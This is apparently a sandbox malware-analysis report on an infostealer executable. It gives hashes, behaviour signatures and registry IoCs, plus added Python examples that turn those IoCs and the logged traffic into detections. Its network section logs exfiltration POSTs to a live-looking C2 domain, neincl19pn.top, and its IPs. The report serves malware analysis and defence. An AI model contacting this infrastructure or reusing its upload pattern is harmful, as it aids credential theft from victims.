Analysis
max time kernel: 118s
max time network: 119s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 19/08/2024, 13:34 UTC
Static task: static1
Behavioral task: behavioral1
  Sample: 624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: 624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe
  Resource: win10v2004-20240802-en
General
Target: 624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe
Size: 6.4MB
MD5: 8947f3e99f8e87418cfa12b68df1d517
SHA1: 24eb725c90c62edad45439321392aa8a13aef65f
SHA256: 624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e
SHA512: 8c8c907f8444eaaf6aa6242d3228115f8456ff825af84ecb5a215a233f1df2dfab11ce8c879f8e528038a0e317f37783d94dc23db9254015fc829602fddad082
SSDEEP: 98304:29TuOQrltBAFyj6z5vlcDJ5oYOkm/SsptqSpzzOKNt:29aTrlTEyOplc9DOtvtX9nNt
Malware Config
Signatures

Credentials from Password Stores: Credentials from Web Browsers (1 TTPs)
  Malicious access to, or copy of, a web browser credential store.

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials and similar profile data.

Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software installed on the system.

System Location Discovery: System Language Discovery (1 TTPs, 1 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe

Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandbox environments.
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe
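The registry IoCs listed under the two discovery signatures above can be turned into a small correlation rule: one process reading the NLS language key, the CentralProcessor\0 key and its ProcessorNameString value, as PID 1740 does here, is the pattern the report flags, while a single CPU-info read on its own is common in benign installers. The following Python is an added example (not tria.ge's detection code and not part of this report). The event lines are constructed in a simple pid/operation/path form from the IoC table above, plus some noise from a second process; the Uninstall key path used for the "Checks installed software" signature is the standard HKLM location, which the report describes but does not print.

```python
import re
from collections import defaultdict

# Registry paths tied to the signatures in the report. The NLS and
# CentralProcessor paths are the IoCs printed above; the Uninstall path is
# the standard location behind "Checks installed software" (assumption: the
# report names the key but lists no path for it).
SIGNATURE_PATTERNS = {
    "System Location Discovery: System Language Discovery":
        [r"\\SYSTEM\\ControlSet\d+\\Control\\NLS\\Language$"],
    "Checks processor information in registry":
        [r"\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0$",
         r"\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\\ProcessorNameString$"],
    "Checks installed software on the system":
        [r"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall(\\|$)"],
}

# Constructed events: "pid<TAB>operation<TAB>path". PID 1740 lines are the
# report's IoCs; PID 900 lines are benign-looking noise added for contrast.
SAMPLE_EVENTS = """\
1740\tKey opened\t\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\NLS\\Language
1740\tKey opened\t\\REGISTRY\\MACHINE\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0
1740\tKey value queried\t\\REGISTRY\\MACHINE\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\\ProcessorNameString
900\tKey opened\t\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
900\tKey opened\t\\REGISTRY\\MACHINE\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0
"""


def parse_events(text):
    """Parse the tab-separated event lines into dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, op, path = line.split("\t", 2)
        events.append({"pid": int(pid), "op": op, "path": path})
    return events


def match_signatures(events):
    """Return {pid: {signature: [paths]}} for every event whose path hits a pattern."""
    hits = defaultdict(lambda: defaultdict(list))
    for ev in events:
        for sig, patterns in SIGNATURE_PATTERNS.items():
            if any(re.search(p, ev["path"], re.IGNORECASE) for p in patterns):
                hits[ev["pid"]][sig].append(ev["path"])
    return {pid: dict(sigs) for pid, sigs in hits.items()}


def discovery_cluster(hits, minimum=2):
    """PIDs that trigger at least `minimum` distinct discovery signatures.

    One CPU-info read is ordinary; several discovery categories from the
    same process is what makes the report's signatures meaningful together.
    """
    return sorted(pid for pid, sigs in hits.items() if len(sigs) >= minimum)


if __name__ == "__main__":
    hits = match_signatures(parse_events(SAMPLE_EVENTS))
    for pid, sigs in hits.items():
        for sig, paths in sigs.items():
            print(f"PID {pid}: {sig} ({len(paths)} path(s))")
    print("discovery cluster:", discovery_cluster(hits))
```

Run against the constructed events, PID 1740 matches both signatures (the CPU signature twice, for the key open and the value query) and is the only PID in the cluster; PID 900 touches CentralProcessor\0 once and is not reported.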
Processes
C:\Users\Admin\AppData\Local\Temp\624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe"
  PID: 1740
  Signatures: System Location Discovery: System Language Discovery; Checks processor information in registry
Network

DNS request
Remote address: 8.8.8.8:53
Request: neincl19pn.top IN A
Response: neincl19pn.top IN A 172.67.168.197; neincl19pn.top IN A 104.21.54.175

HTTP request: POST http://neincl19pn.top/v1/upload.php
Process: 624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe
Remote address: 172.67.168.197:80
Request:
POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary85523871
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 413
Host: neincl19pn.top
Response:
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uR7s6JY9DsE3uqi2ErPV%2B4t7dnmPB0kLHBPVXkzvOyZyMsvxI6RI%2FkrgCfhaQChQv%2F8N72XoHFlxEM%2FdU6XvBGz8LQp51E1jvKsm5j%2F8CCmHXPemOS2SFd6kg1T7YL33vw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b5a861fee06459b-LHR
alt-svc: h3=":443"; ma=86400

HTTP request: POST http://neincl19pn.top/v1/upload.php
Process: 624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe
Remote address: 172.67.168.197:80
Request:
POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary72859479
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 58855
Host: neincl19pn.top

HTTP request: POST http://neincl19pn.top/v1/upload.php
Process: 624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe
Remote address: 172.67.168.197:80
Request:
POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary72859479
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 58855
Host: neincl19pn.top
Response:
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UTZjTdNOb%2Fcm5uLB8hp0bXRP5AzHrMrvGxSMr9LbXfIqYHdRIxk0K1XKOlYoaXYHJGl0Opy0NqlyB1hDbaNteb1UXuaa3tF4vqu0LPiQmhCEs7mI7ODnFz8beYhGVeSWYA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b5a86a9b9ac48c4-LHR
alt-svc: h3=":443"; ma=86400

HTTP request: POST http://neincl19pn.top/v1/upload.php
Process: 624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe
Remote address: 172.67.168.197:80
Request:
POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary14160866
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 30517
Host: neincl19pn.top
Response:
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G%2FKg70RAcgxDwiSJ7WulCBrVGELWR1uG7tsrGHh9SlAHUnHusn7f6OnUyDLJ3bYewJcQ%2FR3wxz8%2FG%2B4RTJB0rV6tU3hdYBD2SC%2F%2Bp5V4%2F9s6h%2FByPUp7iJjgUk8xYFC56A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b5a86f4ecce48c4-LHR
alt-svc: h3=":443"; ma=86400

Connections
Destination: 172.67.168.197:80
URL: http://neincl19pn.top/v1/upload.php
Protocol: http
Process: 624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe
Sent: 34.4kB, received: 1.2kB, packets sent: 32, packets received: 13
  HTTP Request: POST http://neincl19pn.top/v1/upload.php
  HTTP Response: 200
  HTTP Request: POST http://neincl19pn.top/v1/upload.php

Destination: 172.67.168.197:80
URL: http://neincl19pn.top/v1/upload.php
Protocol: http
Process: 624b8a65cbeeb9a10635a297970cacb4a2c43a1c50d92900b71bc5249adec01e.exe
Sent: 148.2kB, received: 5.0kB, packets sent: 116, packets received: 58
  HTTP Request: POST http://neincl19pn.top/v1/upload.php
  HTTP Response: 200
  HTTP Request: POST http://neincl19pn.top/v1/upload.php
  HTTP Response: 200
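The HTTP records above carry more than a domain and an IP. Every request is a multipart POST to the same /v1/upload.php path with a fixed two-byte acknowledgement, the 58855-byte body appears twice with the same boundary, the requests lack the Accept headers a real Chrome browser sends, and the User-Agent claims Windows NT 10.0 although behavioral1 ran on windows7_x64, so the string is hard-coded rather than taken from the host. The following Python is an added example (not tria.ge tooling and not part of this report): it rebuilds the four request heads from the header values shown above as constructed input, extracts a defanged indicator set, and flags those four properties. The check and field names are my own; the NT version table (Windows 7 is NT 6.1, Windows 10 is NT 10.0) is general knowledge, not something the report states.

```python
import re
from collections import Counter

# Sandbox platform behavioral1 ran on, as given in the report's Analysis block.
PLATFORM = "windows7_x64"

# User-Agent string exactly as sent in every request above.
UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36")


def _req(boundary, length):
    """Constructed request head using the header values printed in the report."""
    return (
        "POST /v1/upload.php HTTP/1.1\r\n"
        "Cache-Control: no-cache\r\n"
        "Connection: Keep-Alive\r\n"
        "Pragma: no-cache\r\n"
        f"Content-Type: multipart/form-data; boundary=----Boundary{boundary}\r\n"
        f"User-Agent: {UA}\r\n"
        f"Content-Length: {length}\r\n"
        "Host: neincl19pn.top\r\n"
    )


# The four POSTs as listed above (the 58855-byte request is shown twice).
RAW_REQUESTS = [_req(85523871, 413), _req(72859479, 58855),
                _req(72859479, 58855), _req(14160866, 30517)]
RESOLVED_IPS = ["172.67.168.197", "104.21.54.175"]  # DNS answers in the report

# NT kernel versions behind the sandbox platform names (assumed mapping).
_NT_VERSIONS = [("windows10", "10.0"), ("win10", "10.0"),
                ("windows7", "6.1"), ("win7", "6.1")]


def parse_request(raw):
    """Split an HTTP/1.1 request head into method, path and lower-cased headers."""
    lines = [l for l in raw.splitlines() if l.strip()]
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def defang_host(host):
    """Bracket the dots of a hostname or IP so it cannot be clicked or resolved."""
    return host.replace(".", "[.]")


def ua_nt_version(user_agent):
    m = re.search(r"Windows NT (\d+\.\d+)", user_agent)
    return m.group(1) if m else None


def platform_nt_version(platform):
    name = platform.lower()
    for prefix, version in _NT_VERSIONS:
        if name.startswith(prefix):
            return version
    return None


def build_indicators(raw_requests, resolved_ips):
    """Collapse the requests into one defanged indicator record."""
    reqs = [parse_request(r) for r in raw_requests]
    host, path = reqs[0]["headers"]["host"], reqs[0]["path"]
    boundaries = [re.search(r"boundary=(\S+)", r["headers"]["content-type"]).group(1)
                  for r in reqs]
    return {
        "host": host,
        "url_defanged": f"hxxp://{defang_host(host)}{path}",
        "ips_defanged": [defang_host(ip) for ip in resolved_ips],
        "user_agent": reqs[0]["headers"]["user-agent"],
        "content_lengths": [int(r["headers"]["content-length"]) for r in reqs],
        "boundaries": boundaries,
    }


def analyze(raw_requests, platform):
    """Heuristic checks over the request set; returns a list of findings."""
    reqs = [parse_request(r) for r in raw_requests]
    findings = []
    ua = reqs[0]["headers"].get("user-agent", "")
    claimed, actual = ua_nt_version(ua), platform_nt_version(platform)
    if claimed and actual and claimed != actual:
        findings.append({"check": "ua_platform_mismatch",
                         "detail": f"UA claims NT {claimed}, host ran NT {actual}: hard-coded UA"})
    endpoints = Counter((r["method"], r["headers"]["host"], r["path"]) for r in reqs)
    if len(endpoints) == 1 and len(reqs) > 1:
        (method, host, path), n = next(iter(endpoints.items()))
        findings.append({"check": "single_upload_endpoint",
                         "detail": f"{n} x {method} {host}{path}"})
    bodies = Counter((r["headers"]["content-type"], r["headers"]["content-length"]) for r in reqs)
    for (ctype, clen), n in bodies.items():
        if n > 1:
            findings.append({"check": "repeated_body",
                             "detail": f"{clen}-byte body ({ctype}) sent {n} times: resend"})
    if "chrome/" in ua.lower() and not any("accept" in r["headers"] for r in reqs):
        findings.append({"check": "missing_browser_headers",
                         "detail": "Chrome UA but no Accept header: not a browser"})
    return findings


if __name__ == "__main__":
    for key, value in build_indicators(RAW_REQUESTS, RESOLVED_IPS).items():
        print(f"{key}: {value}")
    for f in analyze(RAW_REQUESTS, PLATFORM):
        print(f"[{f['check']}] {f['detail']}")
```

The defanged URL and IPs are what goes into a ticket or blocklist; the four findings are the properties worth turning into network detections for this family, with the UA/platform mismatch usable only where the true OS of the sending host is known, as it is in a sandbox.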